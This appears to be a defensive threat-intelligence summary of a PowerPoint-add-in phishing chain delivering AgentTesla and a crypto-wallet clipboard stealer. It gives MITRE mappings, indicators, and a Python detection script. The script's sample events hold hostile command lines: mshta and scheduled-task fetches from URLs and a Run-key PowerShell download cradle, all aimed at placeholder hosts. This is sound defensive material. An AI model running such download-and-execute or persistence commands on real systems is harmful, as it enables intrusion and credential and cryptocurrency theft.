Threat actors deliver multiple malware families via malicious PowerPoint Add-Ins and a multi-stage chain that uses cloud services to host payloads. The operation blends phishing, LoLBins, VBS, and PowerShell to drop AgentTesla and a cryptocurrency stealer, with stages hosted on MediaFire, Blogger, and GitHub. #AveMaria #Warzone #AgentTesla #PowerPoint #Emotet #LoLBins #MSHTA #Bitly #MediaFire #Blogger #GitHub
Key points
- Phishing-driven infection: Attacks begin with phishing emails carrying an infected PowerPoint file as an attachment.
- Stage 01: Infected PowerPoint Add-In contains obfuscated VBA that decrypts strings at runtime to run payloads via LoLBins.
- Stage 02: A lightly obfuscated VBS script is delivered from an HTML page and decoded/executed with JavaScript to continue the chain.
- Stage 03: AgentTesla is deployed through a decompressed PowerShell payload that injects into a .NET process and remains fileless.
- Stage 04: Privilege escalation and defense evasion: NSudo is used to escalate privileges, Windows Defender is disabled, and AV exclusions are added via additional VBS/INF sequences.
- Stage 05: A cryptocurrency stealer is delivered (via a Blogger-hosted fake page) and includes VBS that either reuses AgentTesla or loads a PowerShell-based stealer; it also checks clipboard data for cryptocurrency wallet addresses and replaces them with attacker-controlled addresses.
- Attackers increasingly leverage cloud services (MediaFire, Blogger, GitHub) and URL shorteners (Bitly) to add resilience and host payloads.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The infection flow starts with a phishing email that carries the infected file as an attachment. “The infection flow starts with a phishing email that carries the infected file as an attachment.”
- [T1059.001] PowerShell – The script is executed with a combination of PowerShell and mshta, a similar technique employed by BazarLoader. “The script is executed with a combination of PowerShell and mshta, a similar technique employed by BazarLoader.”
- [T1197] Signed Binary Proxy Execution: CMSTP – An INF file carrying the command to run is executed via the cmstp LoLBin. “INF file with the command to be executed … cmstp LoLBin.”
- [T1055] Process Injection – The AgentTesla payload is injected into an instance of aspnet_compiler.exe. “injected into an instance of ‘aspnet_compiler.exe’”
- [T1027] Obfuscated/Compressed Files and Information – The VBS/script payloads are obfuscated and decoded/executed. “lightly obfuscated within an HTML page, which is decoded and executed through a simple JavaScript function.”
- [T1547.001] Registry Run Keys/Startup Folder – Persistence via Windows registry to execute external PowerShell scripts. “Create a persistence mechanism through the Windows registry to execute two PowerShell scripts from external URLs.”
- [T1053.005] Scheduled Task – A scheduled task executes a script from an external URL through mshta approximately every hour. “Create a scheduled task that executes a script from an external URL through mshta approximately every hour.”
- [T1041] Exfiltration Over C2 Channel – AgentTesla sends an HTTP POST with machine information to a malicious server. “AgentTesla sends an HTTP POST request to a malicious server with information about the infected machine.”
- [T1105] Ingress Tool Transfer – NSudo binary is downloaded from GitHub for privilege escalation. “Once running, it downloads a file from GitHub named NSudo, which is used for privilege escalation.”
- [T1059.003] VBScript – Stage 05 uses VBS to load and execute a cryptocurrency stealer; the HTML page hides VBS code. “two malicious VBS within the HTML, which are decoded and executed with a simple JavaScript.”
- [T1056.001] Keylogging – AgentTesla capabilities include stealing keystrokes and browser data (credential access). “AgentTesla is developed in .NET … stealing browser’s passwords, capturing keystrokes, clipboard, etc.”
- [T1056.004] Clipboard Data – The cryptocurrency stealer checks clipboard data for wallet addresses and replaces them. “The malware is fairly simple, it works by checking the clipboard data with a regex that matches the cryptocurrency wallet pattern.”
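The process-creation telemetry these techniques leave behind can be screened with a handful of rules. The following is an added example (not code from the report or from any tool it names) that runs such rules over constructed Sysmon-style events; every hostname, path and task name in it is made up.

```python
import re

# Constructed Sysmon-style process-creation events shaped after the chain the
# report describes; hosts, paths and task names are made up for this example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": "powershell.exe",
     "cmdline": "mshta https://j.mp/PLACEHOLDER-SHORTLINK"},
    {"image": r"C:\Windows\System32\cmstp.exe", "parent": "wscript.exe",
     "cmdline": r"cmstp.exe /ni /s C:\Users\Public\update.inf"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": "wscript.exe",
     "cmdline": 'schtasks /create /sc hourly /tn Updater /tr "mshta https://example.invalid/s"'},
    {"image": r"C:\Windows\System32\reg.exe", "parent": "wscript.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v U /t REG_SZ "
                "/d \"powershell -w hidden -c iex((New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/p'))\""},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     "parent": "powershell.exe", "cmdline": "aspnet_compiler.exe"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": "explorer.exe",
     "cmdline": r"mshta C:\Users\alice\Documents\local.hta"},  # local file, no URL: not flagged
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell Get-Process"},  # benign
]

def _image_is(event, name):
    # Compare only the executable name, case-insensitively.
    return event["image"].lower().endswith("\\" + name)

# Each rule pairs a name with a predicate over one event. The patterns mirror the
# report's tradecraft: LoLBins pulling scripts from URLs, an hourly mshta task,
# a Run-key PowerShell download cradle, and a .NET utility spawned by a script host.
RULES = [
    ("mshta fetching remote script",
     lambda e: _image_is(e, "mshta.exe") and re.search(r"https?://", e["cmdline"], re.I)),
    ("cmstp executing INF",
     lambda e: _image_is(e, "cmstp.exe") and re.search(r"\.inf\b", e["cmdline"], re.I)),
    ("scheduled task running mshta from URL",
     lambda e: _image_is(e, "schtasks.exe")
               and re.search(r"/create\b.*mshta.*https?://", e["cmdline"], re.I)),
    ("Run key launching PowerShell download cradle",
     lambda e: _image_is(e, "reg.exe")
               and re.search(r"\\CurrentVersion\\Run\b.*powershell.*https?://", e["cmdline"], re.I)),
    ("aspnet_compiler spawned by script host (injection target)",
     lambda e: _image_is(e, "aspnet_compiler.exe")
               and re.match(r"(powershell|wscript|cscript|mshta)\.exe$", e["parent"], re.I)),
]

def triage(events):
    """Return (rule name, command line) for every event that matches a rule."""
    return [(name, e["cmdline"]) for e in events for name, pred in RULES if pred(e)]
```

Hits on the two benign-looking events are avoided because the rules key on the combination of binary and remote URL or parent, not on the binary alone.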
Indicators of Compromise
- [Domain] j.mp – Bitly shortened-URL domain passed to the mshta binary to fetch the next stage.
- [Domain] MediaFire – Cloud hosting service used to host VBS/HTML-delivered payloads.
- [Domain] Blogger – Fake web pages hosted on Blogger used to host or disguise payloads (including a cryptocurrency stealer page).
- [Domain] GitHub – Source for NSudo and other payload staging; used to download components.
- [File] NSudo – The privilege-escalation tool downloaded and executed during Stage 04.
- [URL] Blogger-hosted pages – Fake pages used to camouflage cryptocurrency stealer stage.
- [URL] HTML/JS payloads – HTML pages decoding and executing VBS/JS payloads.